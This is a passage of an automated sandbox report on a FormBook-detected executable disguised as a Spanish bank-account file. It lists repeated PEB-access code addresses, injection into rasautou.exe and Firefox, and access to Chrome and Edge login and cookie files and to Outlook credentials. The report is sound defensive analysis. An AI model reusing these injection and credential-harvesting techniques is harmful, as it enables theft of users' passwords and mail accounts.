Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3776E363 mov eax, dword ptr fs:[00000030h]	2_2_3776E363
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3776E363 mov eax, dword ptr fs:[00000030h]	2_2_3776E363
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3776E363 mov eax, dword ptr fs:[00000030h]	2_2_3776E363
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3776A350 mov eax, dword ptr fs:[00000030h]	2_2_3776A350
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37728347 mov eax, dword ptr fs:[00000030h]	2_2_37728347
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37728347 mov eax, dword ptr fs:[00000030h]	2_2_37728347
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37728347 mov eax, dword ptr fs:[00000030h]	2_2_37728347
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37768322 mov eax, dword ptr fs:[00000030h]	2_2_37768322
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37768322 mov eax, dword ptr fs:[00000030h]	2_2_37768322
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37768322 mov eax, dword ptr fs:[00000030h]	2_2_37768322
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775332D mov eax, dword ptr fs:[00000030h]	2_2_3775332D
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772E328 mov eax, dword ptr fs:[00000030h]	2_2_3772E328
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772E328 mov eax, dword ptr fs:[00000030h]	2_2_3772E328
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772E328 mov eax, dword ptr fs:[00000030h]	2_2_3772E328
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3774E310 mov eax, dword ptr fs:[00000030h]	2_2_3774E310
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3774E310 mov eax, dword ptr fs:[00000030h]	2_2_3774E310
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3774E310 mov eax, dword ptr fs:[00000030h]	2_2_3774E310
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3776631F mov eax, dword ptr fs:[00000030h]	2_2_3776631F
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37729303 mov eax, dword ptr fs:[00000030h]	2_2_37729303
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37729303 mov eax, dword ptr fs:[00000030h]	2_2_37729303
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377EF30A mov eax, dword ptr fs:[00000030h]	2_2_377EF30A
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377B330C mov eax, dword ptr fs:[00000030h]	2_2_377B330C
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377B330C mov eax, dword ptr fs:[00000030h]	2_2_377B330C
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377B330C mov eax, dword ptr fs:[00000030h]	2_2_377B330C
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377B330C mov eax, dword ptr fs:[00000030h]	2_2_377B330C
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377633D0 mov eax, dword ptr fs:[00000030h]	2_2_377633D0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377643D0 mov ecx, dword ptr fs:[00000030h]	2_2_377643D0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377B43D5 mov eax, dword ptr fs:[00000030h]	2_2_377B43D5
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772E3C0 mov eax, dword ptr fs:[00000030h]	2_2_3772E3C0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772E3C0 mov eax, dword ptr fs:[00000030h]	2_2_3772E3C0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772E3C0 mov eax, dword ptr fs:[00000030h]	2_2_3772E3C0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772C3C7 mov eax, dword ptr fs:[00000030h]	2_2_3772C3C7
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37803336 mov eax, dword ptr fs:[00000030h]	2_2_37803336
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377363CB mov eax, dword ptr fs:[00000030h]	2_2_377363CB
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377AC3B0 mov eax, dword ptr fs:[00000030h]	2_2_377AC3B0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377393A6 mov eax, dword ptr fs:[00000030h]	2_2_377393A6
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377393A6 mov eax, dword ptr fs:[00000030h]	2_2_377393A6
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775A390 mov eax, dword ptr fs:[00000030h]	2_2_3775A390
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775A390 mov eax, dword ptr fs:[00000030h]	2_2_3775A390
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775A390 mov eax, dword ptr fs:[00000030h]	2_2_3775A390
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37731380 mov eax, dword ptr fs:[00000030h]	2_2_37731380
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37731380 mov eax, dword ptr fs:[00000030h]	2_2_37731380
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37731380 mov eax, dword ptr fs:[00000030h]	2_2_37731380
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37731380 mov eax, dword ptr fs:[00000030h]	2_2_37731380
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37731380 mov eax, dword ptr fs:[00000030h]	2_2_37731380
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3774F380 mov eax, dword ptr fs:[00000030h]	2_2_3774F380
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3774F380 mov eax, dword ptr fs:[00000030h]	2_2_3774F380
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3774F380 mov eax, dword ptr fs:[00000030h]	2_2_3774F380
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3774F380 mov eax, dword ptr fs:[00000030h]	2_2_3774F380
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3774F380 mov eax, dword ptr fs:[00000030h]	2_2_3774F380
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3774F380 mov eax, dword ptr fs:[00000030h]	2_2_3774F380
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377EF38A mov eax, dword ptr fs:[00000030h]	2_2_377EF38A
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772B273 mov eax, dword ptr fs:[00000030h]	2_2_3772B273
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772B273 mov eax, dword ptr fs:[00000030h]	2_2_3772B273
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772B273 mov eax, dword ptr fs:[00000030h]	2_2_3772B273
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377C327E mov eax, dword ptr fs:[00000030h]	2_2_377C327E
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377C327E mov eax, dword ptr fs:[00000030h]	2_2_377C327E
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377C327E mov eax, dword ptr fs:[00000030h]	2_2_377C327E
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377C327E mov eax, dword ptr fs:[00000030h]	2_2_377C327E
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377C327E mov eax, dword ptr fs:[00000030h]	2_2_377C327E
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377C327E mov eax, dword ptr fs:[00000030h]	2_2_377C327E
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377ED270 mov eax, dword ptr fs:[00000030h]	2_2_377ED270
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F124C mov eax, dword ptr fs:[00000030h]	2_2_377F124C
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F124C mov eax, dword ptr fs:[00000030h]	2_2_377F124C
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F124C mov eax, dword ptr fs:[00000030h]	2_2_377F124C
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F124C mov eax, dword ptr fs:[00000030h]	2_2_377F124C
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377EF247 mov eax, dword ptr fs:[00000030h]	2_2_377EF247
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3780B2BC mov eax, dword ptr fs:[00000030h]	2_2_3780B2BC
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3780B2BC mov eax, dword ptr fs:[00000030h]	2_2_3780B2BC
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3780B2BC mov eax, dword ptr fs:[00000030h]	2_2_3780B2BC
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3780B2BC mov eax, dword ptr fs:[00000030h]	2_2_3780B2BC
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775F24A mov eax, dword ptr fs:[00000030h]	2_2_3775F24A
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37750230 mov ecx, dword ptr fs:[00000030h]	2_2_37750230
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_378032C9 mov eax, dword ptr fs:[00000030h]	2_2_378032C9
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377B0227 mov eax, dword ptr fs:[00000030h]	2_2_377B0227
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377B0227 mov eax, dword ptr fs:[00000030h]	2_2_377B0227
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377B0227 mov eax, dword ptr fs:[00000030h]	2_2_377B0227
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3776A22B mov eax, dword ptr fs:[00000030h]	2_2_3776A22B
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3776A22B mov eax, dword ptr fs:[00000030h]	2_2_3776A22B
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3776A22B mov eax, dword ptr fs:[00000030h]	2_2_3776A22B
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772821B mov eax, dword ptr fs:[00000030h]	2_2_3772821B
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377BB214 mov eax, dword ptr fs:[00000030h]	2_2_377BB214
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377BB214 mov eax, dword ptr fs:[00000030h]	2_2_377BB214
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772A200 mov eax, dword ptr fs:[00000030h]	2_2_3772A200
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377402F9 mov eax, dword ptr fs:[00000030h]	2_2_377402F9
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377402F9 mov eax, dword ptr fs:[00000030h]	2_2_377402F9
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377402F9 mov eax, dword ptr fs:[00000030h]	2_2_377402F9
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377402F9 mov eax, dword ptr fs:[00000030h]	2_2_377402F9
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377402F9 mov eax, dword ptr fs:[00000030h]	2_2_377402F9
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377402F9 mov eax, dword ptr fs:[00000030h]	2_2_377402F9
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377402F9 mov eax, dword ptr fs:[00000030h]	2_2_377402F9
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377402F9 mov eax, dword ptr fs:[00000030h]	2_2_377402F9
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377272E0 mov eax, dword ptr fs:[00000030h]	2_2_377272E0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3773A2E0 mov eax, dword ptr fs:[00000030h]	2_2_3773A2E0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3773A2E0 mov eax, dword ptr fs:[00000030h]	2_2_3773A2E0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3773A2E0 mov eax, dword ptr fs:[00000030h]	2_2_3773A2E0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3773A2E0 mov eax, dword ptr fs:[00000030h]	2_2_3773A2E0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3773A2E0 mov eax, dword ptr fs:[00000030h]	2_2_3773A2E0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3773A2E0 mov eax, dword ptr fs:[00000030h]	2_2_3773A2E0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377382E0 mov eax, dword ptr fs:[00000030h]	2_2_377382E0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377382E0 mov eax, dword ptr fs:[00000030h]	2_2_377382E0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377382E0 mov eax, dword ptr fs:[00000030h]	2_2_377382E0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377382E0 mov eax, dword ptr fs:[00000030h]	2_2_377382E0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772D2EC mov eax, dword ptr fs:[00000030h]	2_2_3772D2EC
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772D2EC mov eax, dword ptr fs:[00000030h]	2_2_3772D2EC
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377532C5 mov eax, dword ptr fs:[00000030h]	2_2_377532C5
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772C2B0 mov ecx, dword ptr fs:[00000030h]	2_2_3772C2B0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377EF2AE mov eax, dword ptr fs:[00000030h]	2_2_377EF2AE
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F92AB mov eax, dword ptr fs:[00000030h]	2_2_377F92AB
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377542AF mov eax, dword ptr fs:[00000030h]	2_2_377542AF
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377542AF mov eax, dword ptr fs:[00000030h]	2_2_377542AF
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377292AF mov eax, dword ptr fs:[00000030h]	2_2_377292AF
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37737290 mov eax, dword ptr fs:[00000030h]	2_2_37737290
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37737290 mov eax, dword ptr fs:[00000030h]	2_2_37737290
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37737290 mov eax, dword ptr fs:[00000030h]	2_2_37737290
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377AE289 mov eax, dword ptr fs:[00000030h]	2_2_377AE289
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3778717A mov eax, dword ptr fs:[00000030h]	2_2_3778717A
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3778717A mov eax, dword ptr fs:[00000030h]	2_2_3778717A
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37736179 mov eax, dword ptr fs:[00000030h]	2_2_37736179
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3776716D mov eax, dword ptr fs:[00000030h]	2_2_3776716D
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3776415F mov eax, dword ptr fs:[00000030h]	2_2_3776415F
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772A147 mov eax, dword ptr fs:[00000030h]	2_2_3772A147
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772A147 mov eax, dword ptr fs:[00000030h]	2_2_3772A147
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772A147 mov eax, dword ptr fs:[00000030h]	2_2_3772A147
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_378051B6 mov eax, dword ptr fs:[00000030h]	2_2_378051B6
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377C314A mov eax, dword ptr fs:[00000030h]	2_2_377C314A
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377C314A mov eax, dword ptr fs:[00000030h]	2_2_377C314A
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377C314A mov eax, dword ptr fs:[00000030h]	2_2_377C314A
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377C314A mov eax, dword ptr fs:[00000030h]	2_2_377C314A
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377EF13E mov eax, dword ptr fs:[00000030h]	2_2_377EF13E
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377BA130 mov eax, dword ptr fs:[00000030h]	2_2_377BA130
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37767128 mov eax, dword ptr fs:[00000030h]	2_2_37767128
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37767128 mov eax, dword ptr fs:[00000030h]	2_2_37767128
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113 mov eax, dword ptr fs:[00000030h]	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37760118 mov eax, dword ptr fs:[00000030h]	2_2_37760118
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775510F mov eax, dword ptr fs:[00000030h]	2_2_3775510F
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775510F mov eax, dword ptr fs:[00000030h]	2_2_3775510F
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775510F mov eax, dword ptr fs:[00000030h]	2_2_3775510F
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775510F mov eax, dword ptr fs:[00000030h]	2_2_3775510F
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775510F mov eax, dword ptr fs:[00000030h]	2_2_3775510F
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775510F mov eax, dword ptr fs:[00000030h]	2_2_3775510F
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775510F mov eax, dword ptr fs:[00000030h]	2_2_3775510F
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775510F mov eax, dword ptr fs:[00000030h]	2_2_3775510F
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775510F mov eax, dword ptr fs:[00000030h]	2_2_3775510F
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775510F mov eax, dword ptr fs:[00000030h]	2_2_3775510F

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\rasautou.exe

Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF673300000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: NULL target: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rasautou.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: NULL target: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: NULL target: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\rasautou.exe

Thread APC queued: target process: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\rasautou.exe

Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF673300000

Jump to behavior

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Process created: C:\Users\user\Desktop\cuenta iban-ES65.exe C:\Users\user\Desktop\cuenta iban-ES65.exe	Jump to behavior
Source: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe	Process created: C:\Windows\SysWOW64\rasautou.exe C:\Windows\SysWOW64\rasautou.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe	Jump to behavior

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe

Code function: 0_2_00405D2E GetVersion,LdrInitializeThunk,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405D2E

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000002.00000002.13296486032.00000000373E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.17650481892.0000000000B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.17648564741.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.13297432271.0000000037A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.17651341900.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.17650879103.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.17652208499.0000000005110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\rasautou.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\rasautou.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000002.00000002.13296486032.00000000373E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.17650481892.0000000000B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.17648564741.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.13297432271.0000000037A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.17651341900.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.17650879103.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.17652208499.0000000005110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

